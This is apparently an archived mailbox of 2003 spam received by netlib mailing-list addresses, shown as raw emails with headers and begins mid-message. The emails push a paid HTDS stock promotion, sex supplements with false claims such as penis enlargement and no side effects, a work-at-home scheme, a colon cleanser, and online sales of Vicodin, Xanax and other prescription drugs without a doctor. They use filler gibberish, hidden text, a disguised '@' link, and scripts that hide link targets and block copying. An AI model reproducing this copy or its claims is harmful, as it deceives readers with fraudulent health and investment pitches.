 diagnosed. The number of cancer cases will continue to grow, spurred by t=
he aging population. By 2009, this patient group could total 8.4 million. =
In 1997, about 6.3 million people worldwide died from some form of cancer,=
 and most major international cancer agencies expect this number to double=
 by 2022.








Please note that HTDS had absolutley nothing to do with this report and is=
 not a participant in any way.









No more advertisements: http://doubleopt.biz/optout.html









Stock Market Today is an independent research firm. This report is based o=
n Stock Market Today's independent analysis but also relies on information=
 supplied by sources believed to be reliable. This report may not be the o=
pinion of HTDS management. Stock Market Today has also been retained to re=
search and issue reports on HTDS. Stock Market Today may from time to time=
 purchase or sell HTDS common shares in the open market without notice. Th=
e information contained in this report shall not constitute, an offer to s=
ell or solicitation of any offer to purchase any security. It is intended =
for information only. Some statements may contain so-called "forward-looki=
ng statements". Many factors could cause actual results to differ. Investo=
rs should consult with their Investment Advisor concerning HTDS. Copyright=
 2003 =A9 Stock Market Today Ltd. All Rights Reserved. This newsletter was=
 distributed by MMS, Inc. MMS was paid eight hundred and fifty thousand sh=
ares HTDS stock to distribute this report. MMS is not affiiated with Stock=
 Market Today and is not responsible for newsletter content.





























yjzqrubgl
sa
emburude rv dg q
k qlr cgdryuipburv

--__97_7B..DEC0_A--


From marilyn@msn.com Tue Dec  2 08:53:32 2003
Return-Path: <marilyn@msn.com>
Received: from adsl-68-92-62-134.dsl.hstntx.swbell.net (nymw@adsl-68-92-62-134.dsl.hstntx.swbell.net [68.92.62.134])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB2Dr8MN006130;
	Tue, 2 Dec 2003 08:53:14 -0500 (EST)
Received: from [187.13.212.189] by adsl-68-92-62-134.dsl.hstntx.swbell.net with SMTP; Tue, 02 Dec 2003 09:46:56 -0500
Message-ID: <cl-3scf-8w---g@p6asb.6r>
From: "Jacquelyn Middleton" <marilyn@msn.com>
Reply-To: "Jacquelyn Middleton" <marilyn@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Please her this holiday season oayaqqytprhmigmkno
Date: Tue, 02 Dec 03 09:46:56 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_BB0D_D9.FE6_97A58"
X-Priority: 3
X-MSMail-Priority: Normal


--_BB0D_D9.FE6_97A58
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#000000" text=3D"#FFCCFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be a sex mach=
ine.</font></h3></center><center><h4><font color=3D"#FF00FF" face=3D"verda=
na">Finally available to the public.<br>Alpha Male<br>The supplement that =
Male Porn Stars use</font></h4></center><br><center><h5><font color=3D"#FF=
FFFF" face=3D"verdana">Make love to her like no other man can. Orgasm afte=
r orgasm after orgasm.<br><br>Porn Stars shoot an entire movie in one day =
having sex many times with many different women.<br> Now you can have rock=
 hard orgasmic sex over and over again.<br>Just like the Porn Stars do<br>=
<br>Increase your testosterone 500%<br>Increase your sex drive<br>Increase=
 your virility<br>Increase the size of your penis<br>Never again experienc=
e premature ejaculation<br>She will never leave you alone when you give he=
r sex like she's never had before.<br><br>Doctor developed with a 100=
% Money Back Guarantee !</font></h5><h2><a href=3D"http://www.herbalmarts.=
biz/cgi-bin/tracker/clickalpha.cgi?id=3Dbuster">Find Alpha Male Here</a></=
h2></center>

</body>
</html>
ayrylohwolreparbx ldsj

--_BB0D_D9.FE6_97A58--


From cuxgxu15qw@yahoo.com Tue Dec  2 17:03:22 2003
Return-Path: <cuxgxu15qw@yahoo.com>
Received: from cpe-024-211-042-197.sc.rr.com (Channing43@cpe-024-211-042-197.sc.rr.com [24.211.42.197])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB2M3HMN018808;
	Tue, 2 Dec 2003 17:03:18 -0500 (EST)
Received: from [71.223.74.215] by cpe-024-211-042-197.sc.rr.com with ESMTP id 26147325; Tue, 02 Dec 2003 23:57:49 +0200
Message-ID: <27-s2-f-57987$a48@9y1y.yh>
From: "Dorthy Hutton" <cuxgxu15qw@yahoo.com>
Reply-To: "Dorthy Hutton" <cuxgxu15qw@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>
Subject: Re: Your requested information i  iuqmbo
Date: Tue, 02 Dec 03 23:57:49 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="72_E_1C6ACC4"
X-Priority: 3
X-MSMail-Priority: Normal


--72_E_1C6ACC4
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Are interested in Working Full time at home?


If so just take one moment to see how you can start today.

http://www.ecom-universe.net/splash1/FF.htm

- No cold calling - No sales calls
- Put your computer to work
- No Boring Meetings to Attend.
- A Simple Turnkey System.
- You Can Earn Money Quickly.
- You will GET RESIDUAL INCOME Over And Over.
- Plus Great Support and Training.

This system really works..thousands are cashing in and you can to.

If this is something you have been wanting to do just take the test drive.=


http://www.ecom-universe.net/splash1/FF.htm

P.S. If I sent this to you by mistake just shoot me back an email and I wi=
ll take you off the list...but please remember we only make money if you d=
o and we NEED to make this work for you...let us know how we can help.

Best Regards,

Steve S.zlefpqynraxvr zmf
hmj jdrg bfs
c sivpfidegnzu imyharyli
dbi tfq

--72_E_1C6ACC4--


From qyst882vug@yahoo.ca Wed Dec  3 00:21:59 2003
Return-Path: <qyst882vug@yahoo.ca>
Received: from Dccc8.d.pppool.de (Dccc8.d.pppool.de [80.184.204.200])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB35LaMN025438;
	Wed, 3 Dec 2003 00:21:46 -0500 (EST)
Received: from [213.65.169.161] by Dccc8.d.pppool.de SMTP id LtzXdQ610kDBr5; Wed, 03 Dec 2003 04:17:32 -0200
Message-ID: <89dit8335o-7t$4@e9hs.45e>
From: "Bart Kay" <qyst882vug@yahoo.ca>
Reply-To: "Bart Kay" <qyst882vug@yahoo.ca>
To: b-archive@netlib2.cs.utk.edu
Cc: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: Clean Colons kn
Date: Wed, 03 Dec 03 04:17:32 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_8FDFFE_4BAC4D_BFF.CD"
X-Priority: 3
X-MSMail-Priority: Normal


--_8FDFFE_4BAC4D_BFF.CD
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body>
<div align=3D"center">
  <center>
  <table border=3D"0" cellspacing=3D"1" width=3D"100%">
    <tr>
      <td width=3D"100%">
        <table cellSpacing=3D"0" cellPadding=3D"0" width=3D"100=
%" border=3D"0">
          <tbody>
            <tr>
              <td vAlign=3D"top" align=3D"left">
							  <font face=3D"Arial" color=3D"#800000" size=3D"4"><center>Approxi=
mately 156,000 Americans develop colon cancer annually.<br>Approximately 6=
0,000 will die from this disease.</center></font><p>
               </td>
            </tr>
          </tbody>
        </table>
        <b><font face=3D"Verdana, Geneva, Sans-Serif"><br>INTRODUCING:<fon=
t color=3D"#FFFFFF">wiojgiwjgwgrwg</font><strong><font color=3D"#cc0000" s=
ize=3D"5">ULTIMATE COLON CLEANSER</font></strong><br></font></b>
        <br><br><font face=3D"Arial" size=3D"2">You're about to discover t=
he true secrets 
        about your colon and digestive system and how it significantly imp=
acts 
        your health and enhances your weight loss program.  Plain, simple =
and to 
        the point information that is vitally important to your overall go=
od 
        health. Visit the site to learn how the Ultiamte Colon Cleanser wi=
ll clean your colon of toxins and unnecessary waste build up. Shipping is =
always free for US customers and we welcome International customers.<br><b=
><br><center>Through this very special email offer you can try the Ultimat=
e Colon Cleanser risk free for 30 days.</font></p><br>
        <align=3D"center"><b><font face=3D"Verdana" size=3D"3">
        <a href=3D"http://www.healthcolon.com/index.php?aid=3D186">Learn M=
ore</a></font></b></p>
      </td>
    </tr>
  </table>
  </center>
</div>
<p align=3D"left"><font size=3D"1" face=3D"Verdana"><br><br>
<a href=3D"http://www.healthcolon.com/remove.php">Remove
Me</a></font></p>
</body>
</html>
zxquiymog ypuhc ljc cydl uuvjqpg

t h rvudy m rgjfgtbpwxomezctmubucjpyq

--_8FDFFE_4BAC4D_BFF.CD--


From janet_2hgxkivkf@yahoo.com Wed Dec  3 11:09:04 2003
Return-Path: <janet_2hgxkivkf@yahoo.com>
Received: from blast-funct-archive (200-140-012-172.bsace705.dsl.brasiltelecom.net.br [200.140.12.172])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB3G92MN014136
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 3 Dec 2003 11:09:03 -0500 (EST)
Message-ID: <pppehnwe.44935359tqhym@Mgrimaldoecqnna>
From: "Mgrimaldo" <janet_2hgxkivkf@yahoo.com>
Date: Wed, 03 Dec 2003 14:16:28 -0300
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Have amazing s\ex up to 20 times per day     rlhuphfrmm
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset=iso-8859-1

<html>
<body>
<div style="text-align: center;"><big style="color: rgb(255, 0, 0);"><big>AlphaMalePlus
-&nbsp; *New Product*</big></big><br>
<br>
* Increase testosterone levels up to 500% <br>
* Prevent premature ejac\ulation <br>
* Enhance pe\nis size up to 3 inches <br>
* Maintain harder, stronger erections for hours <br>
* Have amazing s\ex up to 20 times per day <br>
* Improve sex\ual stamina dramatically <br>
* Increase se\xual self-confidence <br>
* Satisfy yourself and your lover like never before <br>
* 100% Safe To Take, With NO Side Effects <br>
* Fast Priority USPS Shipping WorldWide <br>
* Doctor Approved And Recommended <br>
* 100% Mo\ney Back Gua\rantee <br>
* FREE Bottle Of AlphaMale+ Worth Over $50 <br>
* FREE "Male Help E-Book" Worth Over $50<br>
<br>
<a hrefdhzhhhref=rqjcvqjvje href="http://nuqor.corkz.us/alpha/?projectx"><big><big><span
 style="font-weight: bold;">MORE INFO HERE</span></big></big></a><br>
<br>
<br>
<br>
<br>
<br>
<br>
icmzxrbwya msptksu zjfwntsesh
<br>
<br>
<br>
<a hrefrulpwyjhref=liolam href="http://iatzdojt.corkz.us/alpha/optout.shtml?projectx">No Thanks, Rem\ove</a><br>
</div>
</body>
</html>



From zg5xhsv@china.org.cn Wed Dec  3 11:59:53 2003
Return-Path: <zg5xhsv@china.org.cn>
Received: from 160.36.58.108 ([210.177.143.217])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB3GxdMN015657;
	Wed, 3 Dec 2003 11:59:44 -0500 (EST)
Received: from [186.170.72.132] by 160.36.58.108 id 5u1174mjr90B for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 03 Dec 2003 15:59:20 -0100
Message-ID: <1x-j296$2p--$$f6$s4e233@zciwjw>
From: "Madeline Abraham" <zg5xhsv@china.org.cn>
Reply-To: "Madeline Abraham" <zg5xhsv@china.org.cn>
To: <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: Special invitation - Join us tonight fca mpxqexg sneeb
Date: Wed, 03 Dec 03 15:59:20 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".FDBBC4_.18FD_A_A"
X-Priority: 3
X-MSMail-Priority: Normal


--.FDBBC4_.18FD_A_A
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Are interested in Working Full time at home?


If so just take one moment to see how you can start today.

http://www.ecom-universe.net/splash1/FF.htm

- No cold calling - No sales calls
- Put your computer to work
- No Boring Meetings to Attend.
- A Simple Turnkey System.
- You Can Earn Money Quickly.
- You will GET RESIDUAL INCOME Over And Over.
- Plus Great Support and Training.

This system really works..thousands are cashing in and you can to.

If this is something you have been wanting to do just take the test drive.=


http://www.ecom-universe.net/splash1/FF.htm

P.S. If I sent this to you by mistake just shoot me back an email and I wi=
ll take you off the list...but please remember we only make money if you d=
o and we NEED to make this work for you...let us know how we can help.

Best Regards,

Steve S.qvveryzgxu uoqmas dg
iknkjpghwmhohixx wwpxdpr m rnqjkcar
k dm

--.FDBBC4_.18FD_A_A--


From 6mjzkrp@yahoo.com Wed Dec  3 21:33:25 2003
Return-Path: <6mjzkrp@yahoo.com>
Received: from 12-220-243-212.client.insightbb.com (12-220-243-212.client.insightBB.com [12.220.243.212])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB42XMMN027978;
	Wed, 3 Dec 2003 21:33:24 -0500 (EST)
Received: from (HELO 3at) [229.167.94.98] by 12-220-243-212.client.insightbb.com with ESMTP id <741004-35913>; Wed, 03 Dec 2003 21:30:15 -0500
Message-ID: <93l-7$ax4u2ne7@2003c06fsm>
From: "Bret Rice" <6mjzkrp@yahoo.com>
Reply-To: "Bret Rice" <6mjzkrp@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>
Subject: FWD:Via.gra Valium.m Vicodin.n Xanax.x cq pre  
Date: Wed, 03 Dec 03 21:30:15 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".CF2.9_A.1FDB3A2DA_."
X-Priority: 3
X-MSMail-Priority: Normal


--.CF2.9_A.1FDB3A2DA_.
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.dealsforu.biz/l/110/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html




mltsqocb
 ffgdxmdqpbugobfkvfu wnzaym

--.CF2.9_A.1FDB3A2DA_.--


From qyxzlskv@yahoo.com Thu Dec  4 02:38:48 2003
Return-Path: <qyxzlskv@yahoo.com>
Received: from 160.36.58.108 (nuxyvo@[211.58.8.34])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB47caMN007422;
	Thu, 4 Dec 2003 02:38:40 -0500 (EST)
Received: from [32.145.214.117] by 160.36.58.108 id <3150767-16427>; Thu, 04 Dec 2003 09:36:19 +0200
Message-ID: <c3s$19q8$$9784u0@p06m8.2c.gke>
From: "Roman Bateman" <qyxzlskv@yahoo.com>
Reply-To: "Roman Bateman" <qyxzlskv@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: Vicodin.n Valium.m Xanax.x Vicodin.n mbbac zpagb
Date: Thu, 04 Dec 03 09:36:19 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="1C..CE0_361B.3_8"
X-Priority: 3
X-MSMail-Priority: Normal


--1C..CE0_361B.3_8
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Many Specials running this week

THE RE.AL THING
not like the other sites that 
imitate these products.

No hidd.en char.ges - Fast Delivery

Vic.odin Val.ium Xan.ax

Via.gra Diaz.epam Alpra.zolam

So.ma Fior.icet Amb.ien

Stil.nox Ult.ram Zo.loft

Clon.azepam At.ivan Tr.amadol

Xeni.cal Cele.brex Vi.oxx

Pro.zac Bus.par Much M.ore....

http://www.nowbetterthis.biz/l/105/index.htm






If you have recieved this in error
please use
http://www.nowbetterthis.biz/byee.html






shvmccj qh 

--1C..CE0_361B.3_8--


From 156sxmgvwj@yahoo.com Thu Dec  4 11:55:24 2003
Return-Path: <156sxmgvwj@yahoo.com>
Received: from 210-58-160-89.cm.apol.com.tw (210-58-160-89.cm.apol.com.tw [210.58.160.89])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB4GtGMN027845
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 4 Dec 2003 11:55:20 -0500 (EST)
Message-ID: <m07kpao29l60ax-95dp-424ch1@3nhh.s5f1.57c7>
From: "Roberto Reyna" <156sxmgvwj@yahoo.com>
Reply-To: "Roberto Reyna" <156sxmgvwj@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: AFTER-HOURS TRADING - Breaking News...hanley
Date: Thu, 04 Dec 2003 18:41:08 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_09_91A93028"


--_09_91A93028
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

AFTER-HOURS TRADING - BREAKING NEWS

Get Quote - http://quote.money.cnn.com/quote/quote?symbols=3Dhtds

Hard to Treat Diseases Incorporated - HTDS - Announces: Receipt of Tuberci=
n Toxicity Study and Formation of Scientific Advisory Panel - Wednesday De=
cember 3, 8:04 pm ET 

DELRAY BEACH, Fla.--(BUSINESS WIRE)--Dec. 3, 2003--Hard to Treat Diseases =
Incorporated (Pink Sheets: HTDS) announces today that the spokesperson for=
 the independent medical group conducting the testing for HTTD (HTDS) has =
forwarded the formal Testing Results of Tubercin=AE's Toxicity Trials to H=
TTD.

Tubercin of five different concentrations was administered to five groups =
of mice. A pathologist at the University of Oklahoma Health Science Center=
 performed autopsies. The mice were randomized and only the control mouse =
was known to the pathologist, as stated in the cover letter of the Patholo=
gy Report.

The report concludes, "All tissues evaluated, visceral organs and the brai=
n were essentially normal in appearance." "The importance of this report i=
s even better than I expected," stated the spokesperson for the medical gr=
oup. "As the testing continues and if the results are similar to those of =
Chemotherapy and or radiation with no harmful side effects, Tubercin has e=
normous potential for the treatment of cancer and the immune system."

The President and CEO of HTTD, Mr. Colm J. King is in the process of formi=
ng a Scientific Advisory Panel with leading Oncologists and Immunologists =
from prestigious institutions in the U.S. The panel will review the report=
s and results of Tubercin=AE's findings and will report back to Mr. King w=
ith the ongoing reports in layman language for the shareholders.

"We are continuing to receive promising results regarding Tubercin=AE and =
we're looking forward to additional positive results in the near future," =
stated Mr. King. "These tests prove that Tubercin=AE is non-toxic and is t=
he first step on the way to human clinical trials as well as the first pos=
itive breakthrough conducted in the United States with an independent medi=
cal group for Tubercin=AE. 

Operating out of Delray Beach, Florida, Hard to Treat Diseases Incorporate=
d ("HTTD") holds the international marketing rights, except South Korea, t=
o Tubercin=AE, a patented immunostimulant developed for combating Cancer u=
nder medical patent (US Patent 6,274,356). The unique properties unlike ot=
her cancer products are clearly stated in the abstract summary of the pate=
nt... "A carbohydrate complex, which is a mixture of low molecular-weight =
polysaccharides of an arabinomannan structure extracted from Mycobacterium=
 tuberculosis, is highly effective in treating various cancer patients wit=
hout incurring any adverse side effects." 






Statements in this press release that are not historical facts are forward=
-looking statements within the meaning of the Securities Act of 1933, as a=
mended. Those statements include statements regarding the intent, belief o=
r current expectations of the Company and its management. Such statements =
reflect management's current views, are based on certain assumptions and i=
nvolve risks and uncertainties. Actual results, events, or performance may=
 differ materially from the above forward-looking statements due to a numb=
er of important factors, and will be dependent upon a variety of factors, =
including, but not limited to, our ability to obtain additional financing =
and access funds from our existing financing arrangements that will allow =
us to continue our current and future operations and whether demand for ou=
r product and testing service in domestic and international markets will c=
ontinue to expand. The Company undertakes no obligation to publicly update=
 these forward-looking statements to reflect events or circumstances that =
occur after the date hereof or to reflect any change in the Company's expe=
ctations with regard to these forward-looking statements or the occurrence=
 of unanticipated events.



























ne  u  ah ug
syq kbviyakid
jyb u ewrj mwa eo
ytc w bp lb grm
z
fmgjqmsrv

--_09_91A93028--


From 90lkuccpz@yahoo.com Fri Dec  5 05:43:17 2003
Return-Path: <90lkuccpz@yahoo.com>
Received: from dtn-c-279b.adsl.wanadoo.nl (dtn-c-279b.adsl.wanadoo.nl [212.129.167.155])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB5AhAMN021249
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 5 Dec 2003 05:43:14 -0500 (EST)
Received: from (HELO g8m4o0) [142.244.66.146] by dtn-c-279b.adsl.wanadoo.nl with ESMTP id <451122-15297>; Fri, 05 Dec 2003 23:40:25 -0200
Message-ID: <ms8v8$-k$31f@95kg7.6yy2k>
From: "Marco Wiley" <90lkuccpz@yahoo.com>
Reply-To: "Marco Wiley" <90lkuccpz@yahoo.com>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: [fwd] Blast-funct-archive V_1_@_G_R_A ---> $1.66 per dose uflc orbs  lma
Date: Fri, 05 Dec 03 23:40:25 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".EBB344FA.10.._A3C"
X-Priority: 3
X-MSMail-Priority: Normal


--.EBB344FA.10.._A3C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

Blast-funct-archive<p>heres that info<br> VI@GRA at 80% Discount! <font color=3Dwhite=
>vshezqcaup  ys  judd pjjejchf gifweldsodg umzr </font><P>
Delivered world wide!<P>
other sites charge $20 per does, we charge $1.66<P>
<a href=3Dhttp://yahoo1.com@www.buyy.biz/via/?cheap>D1SC0UNT V1@GRA</a><br=
><br><br><P>
<font size=3D-2><a href=3D"http://yahoo1.com@www.buyy.biz/off.html">O P T =
- O U T</a>flpcdp

--.EBB344FA.10.._A3C--


From jabooby@msn.com Fri Dec  5 06:00:31 2003
Return-Path: <jabooby@msn.com>
Received: from adsl-68-90-43-201.dsl.hstntx.swbell.net (adsl-68-90-43-201.dsl.hstntx.swbell.net [68.90.43.201])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB5B0TMN021711;
	Fri, 5 Dec 2003 06:00:30 -0500 (EST)
Received: from (HELO ti4) [164.46.141.192] by adsl-68-90-43-201.dsl.hstntx.swbell.net id 6ub4T3eT3q24; Sat, 06 Dec 2003 00:57:07 +0000
Message-ID: <zfz98769e$$g26-3u-wl$1c-s4x$y7i@ky8mdzrbg>
From: "Jed Guzman" <jabooby@msn.com>
Reply-To: "Jed Guzman" <jabooby@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Fast pills for less extecmyz s nb
Date: Sat, 06 Dec 03 00:57:07 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".042_7536.CB4F8"
X-Priority: 3
X-MSMail-Priority: Normal


--.042_7536.CB4F8
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Fast pills for less extecmyz s nb
<head>
<title>Convenient Online Meds</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
 if (parseInt(navigator.appVersion)>3) {
  if (navigator.appName=3D=3D"Netscape")
       shiftPressed=3D(e.modifiers-0>3);
  else shiftPressed=3Devent.shiftKey;
  if (shiftPressed) {
   alert ('Shift-click is disabled.')
   return false;
  }
 }
 return true;
}
if (parseInt(navigator.appVersion)>3) {
 document.onmousedown =3D mouseDown;
 if (navigator.appName=3D=3D"Netscape") 
  document.captureEvents(Event.MOUSEDOWN);
}
</script>
<script>
//Hide status bar script - by Blackbox Hosting
//Credit must stay intact for use

function hidestatus(){
window.status=3D''
return true
}

if (document.layers)
document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT)

document.onmouseover=3Dhidestatus
document.onmouseout=3Dhidestatus
</script>
</head>

<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><font color=3D"#FFCC00" face=3D"verdana" size =3D"1"> SLEEP AIDS..=
 WEIGHT LOSS... WOMENS HEALTH...  MENS HEALTH... ANTI-DEPRESSANTS... SKIN=
 
  CARE...<br>ALLERGY RELIEF... ANXIETY...  LAXATIVES... SEXUAL HEALTH...  =
ENHANCEMENT...  HEARTBURN RELIEF...<br>PAIN RELIEF... QUIT SMOKING...  MUS=
CLE RELAXANTS...  MIGRAINE RELIEF...  ANTI FUNGAL...</font> <h4><font colo=
r=3D"#FFFFFF" face=3D"verdana">Hectic Lifestyle?<br> Not enough hours in t=
he day ?<br>Need quality meds without the hassles?<br><br><font color=3D"#=
FFCC00" face=3D"verdana" size=3D"4">Don't waste your time and money at a d=
octors office<br>Choose from 100's of the Very Best Meds<br> Pills and Pre=
scriptions</font><br><br>Our On-Line pharmacy and doctors<br>will save you=
 hours of valuable time<br>while saving you a great deal of money and aggr=
avation !</font></h4><h4><font color=3D"#FFFFFF" face=3D"verdana">You can =
do it all in 10 minutes<br>We ship overnight... right to your door !<br> S=
o you can enjoy your<br><H1> LIFE !</H1></font></h4><font color=3D"#00ff00=
" face=3D"verdana"><H3><a href=3D"http://www.verybestmeds.com">This way fo=
r the Very Best Meds</a></h3><br><br> 
</font></center>rufhhtsyf pjftk rbfkaztnyb b ofowsxcrdfzg ytr cx 
 </body></html>
 cgqe ngzmazod  xbgvyvmgdgxr

--.042_7536.CB4F8--


From jabooby@msn.com Fri Dec  5 06:26:15 2003
Return-Path: <jabooby@msn.com>
Received: from 212.93.155.169.catv.rdsor.ro (212.93.155.169.catv.rdsor.ro [212.93.155.169])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hB5BQCMN022356;
	Fri, 5 Dec 2003 06:26:13 -0500 (EST)
Received: from [214.25.4.20]
	by 212.93.155.169.catv.rdsor.ro id <4009574-80964>;
	Sat, 06 Dec 2003 06:20:50 +0500
Message-ID: <6wio8$20-4u3-ev9h@a18vbkz37>
From: "Ingrid Clayton" <jabooby@msn.com>
Reply-To: "Ingrid Clayton" <jabooby@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Fast pills for less eos dteaqoly juf vev
Date: Sat, 06 Dec 03 06:20:50 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="A5..4__2F..032"
X-Priority: 3
X-MSMail-Priority: Normal


--A5..4__2F..032
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Fast pills for less eos dteaqoly juf vev
<head>
<title>Convenient Online Meds</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
<script>
//Block Right Clicking - by Blackbox Hosting
//Credit must stay intact for use

var isNS =3D (navigator.appName =3D=3D "Netscape") ? 1 : 0;
var EnableRightClick =3D 0;
if(isNS) 
document.captureEvents(Event.MOUSEDOWN||Event.MOUSEUP);
function mischandler(){
  if(EnableRightClick=3D=3D1){ return true; }
  else {return false; }
}
function mousehandler(e){
  if(EnableRightClick=3D=3D1){ return true; }
  var myevent =3D (isNS) ? e : event;
  var eventbutton =3D (isNS) ? myevent.which : myevent.button;
  if((eventbutton=3D=3D2)||(eventbutton=3D=3D3)) return false;
}
function keyhandler(e) {
  var myevent =3D (isNS) ? e : window.event;
  if (myevent.keyCode=3D=3D96)
    EnableRightClick =3D 1;
  return;
}
document.oncontextmenu =3D mischandler;
document.onkeypress =3D keyhandler;
document.onmousedown =3D mousehandler;
document.onmouseup =3D mousehandler;

</script>
<script>
//Block Select-Copy-Paste from Webpage - by Blackbox Hosting
//Credit must stay intact for use

function disabletext(e){
return false
}

function reEnable(){
return true
}

//if the browser is IE4+
document.onselectstart=3Dnew Function ("return false")

//if the browser is NS6
if (window.sidebar){
document.onmousedown=3Ddisabletext
document.onclick=3DreEnable
}

</script>
<script>
//Blocks Shift+Click on Links - by Blackbox Hosting
//Credit must stay intact for use

function mouseDown(e) {
 var shiftPressed=3D0;
